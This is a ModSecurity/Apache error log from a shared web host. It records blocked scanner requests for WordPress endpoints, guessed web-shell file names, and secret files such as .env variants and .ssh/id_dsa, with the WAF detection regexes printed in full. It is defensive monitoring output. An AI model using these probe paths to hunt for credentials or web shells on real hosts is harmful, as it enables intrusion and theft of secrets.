[Tue May 26 18:42:21.699371 2026] [security2:error] [pid 1015481:tid 1015707] [client 146.190.83.0:51946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWcNbQIKfWDMlp2INdgowAAAWo"]
[Tue May 26 18:42:21.841227 2026] [security2:error] [pid 1015481:tid 1015607] [remote 103.11.102.106:36262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWcNbQIKfWDMlp2INdgnwABh30"]
[Tue May 26 18:42:22.582216 2026] [security2:error] [pid 1015481:tid 1015723] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcNrQIKfWDMlp2INdguAAAAXo"]
[Tue May 26 18:42:23.019913 2026] [security2:error] [pid 1015481:tid 1015623] [client 146.190.83.0:52029] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWcN7QIKfWDMlp2INdg0QAAARY"]
[Tue May 26 18:42:23.223315 2026] [security2:error] [pid 1015481:tid 1015496] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcN7QIKfWDMlp2INdg3wABCw4"]
[Tue May 26 18:42:23.223460 2026] [security2:error] [pid 1015481:tid 1015612] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcN7QIKfWDMlp2INdg3wABCw4"]
[Tue May 26 18:42:24.301792 2026] [security2:error] [pid 1015481:tid 1015724] [client 146.190.83.0:52109] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWcOLQIKfWDMlp2INdhCAAAAXs"]
[Tue May 26 18:42:24.488644 2026] [security2:error] [pid 1015481:tid 1015712] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcOLQIKfWDMlp2INdg-wAAAW8"]
[Tue May 26 18:42:25.133210 2026] [security2:error] [pid 1015481:tid 1015612] [client 130.131.252.177:1128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcOLQIKfWDMlp2INdhFgAAAQs"]
[Tue May 26 18:42:25.133328 2026] [security2:error] [pid 1015481:tid 1015612] [client 130.131.252.177:1128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcOLQIKfWDMlp2INdhFgAAAQs"]
[Tue May 26 18:42:25.249466 2026] [security2:error] [pid 1015481:tid 1015625] [client 130.131.252.177:1125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/wp-conflg.php"] [unique_id "ahWcObQIKfWDMlp2INdhHwAAARg"]
[Tue May 26 18:42:25.249568 2026] [security2:error] [pid 1015481:tid 1015625] [client 130.131.252.177:1125] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/wp-conflg.php"] [unique_id "ahWcObQIKfWDMlp2INdhHwAAARg"]
[Tue May 26 18:42:25.376207 2026] [security2:error] [pid 1015481:tid 1015696] [client 130.131.252.177:1680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/an.php"] [unique_id "ahWcObQIKfWDMlp2INdhIAAAAV8"]
[Tue May 26 18:42:25.376295 2026] [security2:error] [pid 1015481:tid 1015696] [client 130.131.252.177:1680] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/an.php"] [unique_id "ahWcObQIKfWDMlp2INdhIAAAAV8"]
[Tue May 26 18:42:25.493130 2026] [security2:error] [pid 1015481:tid 1015626] [client 130.131.252.177:11181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/ma.php"] [unique_id "ahWcObQIKfWDMlp2INdhJwAAARk"]
[Tue May 26 18:42:25.493214 2026] [security2:error] [pid 1015481:tid 1015626] [client 130.131.252.177:11181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/ma.php"] [unique_id "ahWcObQIKfWDMlp2INdhJwAAARk"]
[Tue May 26 18:42:25.618808 2026] [security2:error] [pid 1015481:tid 1015627] [client 130.131.252.177:1104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/gm.php"] [unique_id "ahWcObQIKfWDMlp2INdhLAAAARo"]
[Tue May 26 18:42:25.618906 2026] [security2:error] [pid 1015481:tid 1015627] [client 130.131.252.177:1104] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/gm.php"] [unique_id "ahWcObQIKfWDMlp2INdhLAAAARo"]
[Tue May 26 18:42:25.738197 2026] [security2:error] [pid 1015481:tid 1015656] [client 130.131.252.177:1710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/lock360.php"] [unique_id "ahWcObQIKfWDMlp2INdhMwAAATc"]
[Tue May 26 18:42:25.738302 2026] [security2:error] [pid 1015481:tid 1015656] [client 130.131.252.177:1710] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/lock360.php"] [unique_id "ahWcObQIKfWDMlp2INdhMwAAATc"]
[Tue May 26 18:42:25.867272 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.252.177:1715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/ppx.php"] [unique_id "ahWcObQIKfWDMlp2INdhNwAAARA"]
[Tue May 26 18:42:25.867382 2026] [security2:error] [pid 1015481:tid 1015617] [client 130.131.252.177:1715] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/ppx.php"] [unique_id "ahWcObQIKfWDMlp2INdhNwAAARA"]
[Tue May 26 18:42:25.994235 2026] [security2:error] [pid 1015481:tid 1015684] [client 130.131.252.177:1677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/about.php"] [unique_id "ahWcObQIKfWDMlp2INdhOwAAAVM"]
[Tue May 26 18:42:25.994360 2026] [security2:error] [pid 1015481:tid 1015684] [client 130.131.252.177:1677] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/about.php"] [unique_id "ahWcObQIKfWDMlp2INdhOwAAAVM"]
[Tue May 26 18:42:26.120839 2026] [security2:error] [pid 1015481:tid 1015705] [client 130.131.252.177:1682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/filexp.php"] [unique_id "ahWcOrQIKfWDMlp2INdhPAAAAWg"]
[Tue May 26 18:42:26.120921 2026] [security2:error] [pid 1015481:tid 1015705] [client 130.131.252.177:1682] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/filexp.php"] [unique_id "ahWcOrQIKfWDMlp2INdhPAAAAWg"]
[Tue May 26 18:42:26.238011 2026] [security2:error] [pid 1015481:tid 1015735] [client 130.131.252.177:1681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/m7rpo0.php"] [unique_id "ahWcOrQIKfWDMlp2INdhPgAAAYY"]
[Tue May 26 18:42:26.238106 2026] [security2:error] [pid 1015481:tid 1015735] [client 130.131.252.177:1681] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/m7rpo0.php"] [unique_id "ahWcOrQIKfWDMlp2INdhPgAAAYY"]
[Tue May 26 18:42:26.360419 2026] [security2:error] [pid 1015481:tid 1015680] [client 130.131.252.177:1105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/a1.php"] [unique_id "ahWcOrQIKfWDMlp2INdhQgAAAU8"]
[Tue May 26 18:42:26.360602 2026] [security2:error] [pid 1015481:tid 1015680] [client 130.131.252.177:1105] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/a1.php"] [unique_id "ahWcOrQIKfWDMlp2INdhQgAAAU8"]
[Tue May 26 18:42:26.484621 2026] [security2:error] [pid 1015481:tid 1015700] [client 130.131.252.177:1712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/dr.php"] [unique_id "ahWcOrQIKfWDMlp2INdhTAAAAWM"]
[Tue May 26 18:42:26.484765 2026] [security2:error] [pid 1015481:tid 1015700] [client 130.131.252.177:1712] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/dr.php"] [unique_id "ahWcOrQIKfWDMlp2INdhTAAAAWM"]
[Tue May 26 18:42:26.566290 2026] [security2:error] [pid 1015481:tid 1015687] [client 146.190.83.0:52184] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWcOrQIKfWDMlp2INdhUQAAAVY"]
[Tue May 26 18:42:26.611121 2026] [security2:error] [pid 1015481:tid 1015629] [client 130.131.252.177:1093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/7gt.php"] [unique_id "ahWcOrQIKfWDMlp2INdhUgAAARw"]
[Tue May 26 18:42:26.611244 2026] [security2:error] [pid 1015481:tid 1015629] [client 130.131.252.177:1093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/7gt.php"] [unique_id "ahWcOrQIKfWDMlp2INdhUgAAARw"]
[Tue May 26 18:42:26.730422 2026] [security2:error] [pid 1015481:tid 1015679] [client 130.131.252.177:1097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/2468.php"] [unique_id "ahWcOrQIKfWDMlp2INdhWQAAAU4"]
[Tue May 26 18:42:26.730537 2026] [security2:error] [pid 1015481:tid 1015679] [client 130.131.252.177:1097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/2468.php"] [unique_id "ahWcOrQIKfWDMlp2INdhWQAAAU4"]
[Tue May 26 18:42:26.871595 2026] [security2:error] [pid 1015481:tid 1015655] [client 130.131.252.177:1682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/s2.php"] [unique_id "ahWcOrQIKfWDMlp2INdhWgAAATY"]
[Tue May 26 18:42:26.871763 2026] [security2:error] [pid 1015481:tid 1015655] [client 130.131.252.177:1682] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/s2.php"] [unique_id "ahWcOrQIKfWDMlp2INdhWgAAATY"]
[Tue May 26 18:42:26.995860 2026] [security2:error] [pid 1015481:tid 1015717] [client 130.131.252.177:11152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/tiny2.php"] [unique_id "ahWcOrQIKfWDMlp2INdhXQAAAXQ"]
[Tue May 26 18:42:26.995994 2026] [security2:error] [pid 1015481:tid 1015717] [client 130.131.252.177:11152] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/tiny2.php"] [unique_id "ahWcOrQIKfWDMlp2INdhXQAAAXQ"]
[Tue May 26 18:42:27.125707 2026] [security2:error] [pid 1015481:tid 1015628] [client 130.131.252.177:1713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.252.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/asd.php"] [unique_id "ahWcO7QIKfWDMlp2INdhZQAAARs"]
[Tue May 26 18:42:27.125812 2026] [security2:error] [pid 1015481:tid 1015628] [client 130.131.252.177:1713] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.abilitypneumaticsystems.com"] [uri "/asd.php"] [unique_id "ahWcO7QIKfWDMlp2INdhZQAAARs"]
[Tue May 26 18:42:27.681770 2026] [security2:error] [pid 1015481:tid 1015654] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcO7QIKfWDMlp2INdhbgAAATU"]
[Tue May 26 18:42:28.460830 2026] [security2:error] [pid 1015481:tid 1015650] [client 64.233.173.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWcPLQIKfWDMlp2INdhmgAAATE"]
[Tue May 26 18:42:28.712342 2026] [security2:error] [pid 1015481:tid 1015605] [remote 212.224.100.2:34720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcPLQIKfWDMlp2INdhmwABWXs"]
[Tue May 26 18:42:29.610444 2026] [core:error] [pid 1015481:tid 1015655] [client 74.7.228.60:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:42:29.610461 2026] [core:error] [pid 1015481:tid 1015655] [client 74.7.228.60:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:42:29.610608 2026] [security2:error] [pid 1015481:tid 1015655] [client 74.7.228.60:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "subbroker.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWcPbQIKfWDMlp2INdhzwAAATY"]
[Tue May 26 18:42:29.611095 2026] [security2:error] [pid 1015481:tid 1015722] [client 74.7.228.60:36436] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "subbroker.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWcPbQIKfWDMlp2INdhzQABeT4"]
[Tue May 26 18:42:29.699243 2026] [security2:error] [pid 1015481:tid 1015633] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcPbQIKfWDMlp2INdhwgAAASA"]
[Tue May 26 18:42:31.089635 2026] [security2:error] [pid 1015481:tid 1015709] [client 85.121.215.239:37880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/api/.env"] [unique_id "ahWcP7QIKfWDMlp2INdiAgAAAWw"]
[Tue May 26 18:42:31.089891 2026] [security2:error] [pid 1015481:tid 1015707] [client 85.121.215.239:37858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.env"] [unique_id "ahWcP7QIKfWDMlp2INdiBQAAAWo"]
[Tue May 26 18:42:31.090103 2026] [security2:error] [pid 1015481:tid 1015726] [client 85.121.215.239:37888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/public/.env"] [unique_id "ahWcP7QIKfWDMlp2INdiAwAAAX0"]
[Tue May 26 18:42:31.090883 2026] [security2:error] [pid 1015481:tid 1015651] [client 85.121.215.239:37870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.env.bak"] [unique_id "ahWcP7QIKfWDMlp2INdh-wAAATI"]
[Tue May 26 18:42:31.093041 2026] [security2:error] [pid 1015481:tid 1015734] [client 85.121.215.239:37886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/app/.env"] [unique_id "ahWcP7QIKfWDMlp2INdiCAAAAYU"]
[Tue May 26 18:42:31.093975 2026] [security2:error] [pid 1015481:tid 1015692] [client 85.121.215.239:37884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/backend/.env"] [unique_id "ahWcP7QIKfWDMlp2INdiDAAAAVs"]
[Tue May 26 18:42:31.094647 2026] [security2:error] [pid 1015481:tid 1015730] [client 85.121.215.239:37868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.env.backup"] [unique_id "ahWcP7QIKfWDMlp2INdiCQAAAYE"]
[Tue May 26 18:42:31.148307 2026] [security2:error] [pid 1015481:tid 1015676] [client 85.121.215.239:37894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "vobre.eu"] [uri "/.ssh/id_dsa"] [unique_id "ahWcP7QIKfWDMlp2INdiDwAAAUs"]
